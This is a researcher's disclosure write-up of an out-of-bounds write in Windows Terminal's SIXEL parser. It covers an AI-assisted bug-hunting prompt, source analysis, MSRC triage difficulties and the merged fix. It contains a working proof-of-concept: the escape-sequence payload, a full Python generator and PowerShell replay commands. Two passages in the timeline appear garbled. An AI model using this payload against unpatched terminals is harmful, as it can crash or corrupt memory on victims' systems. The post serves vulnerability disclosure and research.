Windows Terminal SIXEL: when a good prompt met a stubborn OOB write
This was not a clean "AI finds bug, vendor reproduces, patch lands" story. It was messier and more useful than that. A focused prompt helped me find a real out-of-bounds write in Windows Terminal's SIXEL parser. WinDbg convinced me it was a true positive long before the fix landed, but the report also showed where modern vulnerability triage gets hard: a small change in output chunking made the difference between a visible allocation exception and the later access violation I was seeing locally.
The bug was eventually fixed in Windows Terminal PR #20213, with the commit message saying exactly what mattered: "prevent allocating an absurd amount of memory or writing OOB." I am writing this down because the technical bug is only half the lesson. The other half is that prompt quality, repro detail, and patience now matter a lot more than a crash screenshot.
The prompt that helped
The useful prompt was not just "find bugs in Terminal." It constrained the model to a target, a bug class, and an evidence bar. That changed the work from broad code browsing into a repeatable security review loop.
We are doing authorized offensive security research in a controlled lab.
Focus on the Windows Terminal / OpenConsole source code.
Look for remotely reachable memory-safety issues triggered by crafted terminal content or files.
Prioritize integer overflows, OOB writes, and parser state bugs.
For each candidate:
- show the exact source path and function
- explain attacker control over the input
- build a minimal PoC payload
- require crash-dump evidence before calling it a true positive
- do not treat speculation as a finding
The important part is the last line. AI is very good at producing plausible vulnerability narratives. It is much less useful if you let it stop at "this looks risky." For this bug, the prompt forced the loop to end in a payload, a dump, a stack trace, and a bounds calculation.
The source-level smell
The first thing that looked suspicious was image-buffer sizing in SixelParser::_resizeImageBuffer().
The required size was computed using til::CoordType, which is a 32-bit coordinate type, and only then compared
against the vector size.
void SixelParser::_resizeImageBuffer(const til::CoordType requiredHeight)
{
const auto requiredSize = (_imageCursor.y + requiredHeight) * _imageMaxWidth;
if (static_cast<size_t>(requiredSize) > _imageBuffer.size())
{
static constexpr auto transparentPixel = IndexedPixel{ .transparent = true };
_imageBuffer.resize(requiredSize, transparentPixel);
}
}
Later, the write path derived a pointer from the same image geometry:
const auto targetOffset = _imageCursor.y * _imageMaxWidth + _imageCursor.x;
auto imageBufferPtr = reinterpret_cast<int16_t*>(_imageBuffer.data() + targetOffset);
That does not automatically prove a vulnerability. The real question was whether a terminal-controlled sequence could drive the parser into a state where the vector did not match the cursor geometry. The path that mattered was SIXEL display mode plus many SIXEL next-line commands.
The payload shape
The reproducer was small. It requested a very wide terminal, enabled SIXEL display mode, started a SIXEL DCS sequence,
sent a large number of DECGNL next-line commands (-), and then ended the DCS.
ESC [ 8 ; 24 ; 3276 t
ESC [ ? 80 h
ESC P q
"-" repeated 12000 times
ESC \
python3.10 poc/sixel_integer_overflow_poc.py --lines 12000 --resize-cols 3276 --output payload.bin
The generator is intentionally small: it writes one resize request, enables SIXEL display mode, opens a SIXEL DCS,
emits many next-line commands, and then terminates the sequence. The standalone script is here:
sixel_integer_overflow_poc.py.
Full payload generator (Python)
Download: sixel_integer_overflow_poc.py.
#!/usr/bin/env python3
"""
Generate a crafted VT payload that drives the SIXEL parser's signed int32 size math.
This payload is intended for authorized lab testing only.
"""
from __future__ import annotations
import argparse
import sys
def _build_payload(lines: int, resize_cols: int, resize_rows: int) -> bytes:
parts: list[bytes] = []
# Optional: request a very wide terminal to reduce the number of SIXEL lines needed.
if resize_cols > 0:
parts.append(f"\x1b[8;{resize_rows};{resize_cols}t".encode("ascii"))
# Enable SIXEL display mode (DECSDM).
parts.append(b"\x1b[?80h")
# Start SIXEL: DCS ... q
parts.append(b"\x1bPq")
# A run of DECGNL commands ('-') repeatedly moves the image cursor down and
# triggers _resizeImageBuffer(_sixelHeight) each time.
parts.append(b"-" * lines)
# End DCS string.
parts.append(b"\x1b\\")
return b"".join(parts)
def main() -> int:
parser = argparse.ArgumentParser(description="Generate a SIXEL integer-overflow stress payload.")
parser.add_argument("--lines", type=int, default=200000, help="Number of SIXEL next-line commands ('-').")
parser.add_argument(
"--resize-cols",
type=int,
default=3276,
help="Requested columns via CSI 8 ; rows ; cols t. Use 0 to skip resize request.",
)
parser.add_argument("--resize-rows", type=int, default=24, help="Rows used with --resize-cols.")
parser.add_argument("--output", default="poc/sixel_integer_overflow_payload.bin", help="Output payload path.")
parser.add_argument("--stdout", action="store_true", help="Write payload to stdout instead of --output.")
args = parser.parse_args()
if args.lines <= 0:
parser.error("--lines must be > 0")
if args.resize_cols < 0 or args.resize_rows <= 0:
parser.error("resize values must be positive (or cols=0 to disable resize request)")
payload = _build_payload(args.lines, args.resize_cols, args.resize_rows)
if args.stdout:
sys.stdout.buffer.write(payload)
return 0
with open(args.output, "wb") as f:
f.write(payload)
print(f"[+] Wrote {len(payload)} bytes to {args.output}")
print("[*] Replay examples (raw byte output):")
print(" PowerShell:")
print(
" $b=[IO.File]::ReadAllBytes('"
+ args.output
+ "');$s=[Console]::OpenStandardOutput();$s.Write($b,0,$b.Length);$s.Flush()"
)
print(" Python:")
print(f" python -c \"import sys;sys.stdout.buffer.write(open(r'{args.output}','rb').read())\"")
return 0
if __name__ == "__main__":
raise SystemExit(main())
The raw-byte replay detail mattered. The path was sensitive to how the terminal received chunks of the sequence.
$b=[IO.File]::ReadAllBytes("$env:USERPROFILE\Desktop\payload.bin")
$s=[Console]::OpenStandardOutput()
$s.Write($b,0,$b.Length)
$s.Flush()
The crash proof
On OpenConsole.exe 1.23.2601.21001 from Windows Terminal v1.23.20211.0, the final
crash was a write access violation in the SIXEL parser. The dump showed the write target past the vector end.
Failure.Bucket:
INVALID_POINTER_WRITE_c0000005_OpenConsole.exe!Microsoft::Console::VirtualTerminal::SixelParser::_parseCommandChar
Faulting instruction:
mov word ptr [rdx],cx
_Myend : 0x000001e3`cbc71d40
rdx : 0x000001e3`cbc802d2
rdx - _Myend = 58770 (0xE592)
One detail later became important: my ProcDump output also showed a first-chance std::bad_alloc before the
final access violation. That meant the allocation failure path existed in my repro too; it just was not the end of the story.
Where triage got stuck
MSRC tried to reproduce the issue more than once and could not get the same access violation. Their path usually stopped at
std::vector throwing bad_alloc or length_error during resize. From their point of view,
the exception appeared to prevent the AV.
That is a fair triage problem. When bug bounty programs receive more AI-assisted reports, they will see more reports that are close to real bugs but missing one small precondition. In this case, the missing precondition was not a magic registry setting. It was output chunking. PowerShell 5 and PowerShell 7 did not behave the same way for this payload.
vector too long, while another reached the later OOB write.
The GitHub turn
Before GitHub, I had already tried MSRC twice. The first case was created on January 30, 2026. The second case was created
on February 24, 2026 with better crash evidence and was last modified on March 26, 2026. Both ended as complete/closed, with
the conclusion that the issue could not be reproduced. From their side, they were usually stopping at a safe-looking
vector too long exception.
From my side, the WinDbg evidence was hard to ignore. The register state and vector bounds showed an actual write past
_Myend, not just a generic crash. That made me want to understand whether I had a false positive, whether the
report was missing a precondition, or whether the triage path was simply exercising a different chunking behavior. So I opened
GitHub issue #20149
with the source-level concern, the payload shape, the dump evidence, and the exact WinDbg bounds proof.
That public thread made the missing context visible. The maintainers tested different shells, narrowed the behavior to chunking, and connected the bad allocation path to the later parser-state problem.
108187 and the report title "OpenConsole SIXEL parser out-of-bounds write via crafted..."vector too long, then identified PowerShell/version chunking as the missing behavior.main as c829d4ca5 and closed the issue.1.24 and 1.25 servicing pipelines with backport commits referenced from the issue.The fix
The merged fix has two parts. First, SIXEL character processing is wrapped in a catch-all. If parsing throws, the handler
returns false, which tells the state machine to ignore the rest of the DCS content.
return [&](const auto ch) {
try
{
_parseCommandChar(ch);
}
catch (...)
{
// Ignore all further content.
return false;
}
return true;
};
Second, _executeNextLine() stops growing the hidden image once there is no visible pixel height left. In SIXEL
display mode, the image should not keep extending beyond the bottom of the display if the extra rows will never render.
if (_availablePixelHeight > 0)
{
_imageCursor.y += _sixelHeight;
_availablePixelHeight -= _sixelHeight;
_resizeImageBuffer(_sixelHeight);
_fillImageBackgroundWhenScrolled();
}
It is worth noting what the fix did not do: it did not rewrite _resizeImageBuffer() into fully overflow-safe
arithmetic. The fix instead removes the dangerous growth path for this bug and prevents exception recovery from continuing
inside a stale SIXEL transaction.
The bigger lesson
I do think AI will increase the volume of this class of finding. Models are getting good at noticing memory-safety patterns: size math, parser state, allocator failure paths, and "this vector must have grown before this write" assumptions.
But that does not mean every AI-assisted report is ready for a bounty queue. The responsibility on the researcher is higher, not lower. If a finding depends on output chunking, shell version, terminal mode, or an exception being swallowed between transactions, the report needs to say so. I missed that part at first. The dump was real, but the repro was not complete enough.
In the end, the effective part was not "AI found a bug." It was the loop: constrain the model, force a PoC, capture the dump, ask why triage sees something different, and keep reducing the mismatch until the bug becomes obvious to someone else too.
Thanks to the Windows Terminal maintainers for digging into the chunking behavior and landing the fix. This post is written from the researcher's side of the timeline; the useful outcome is that the bug is now fixed.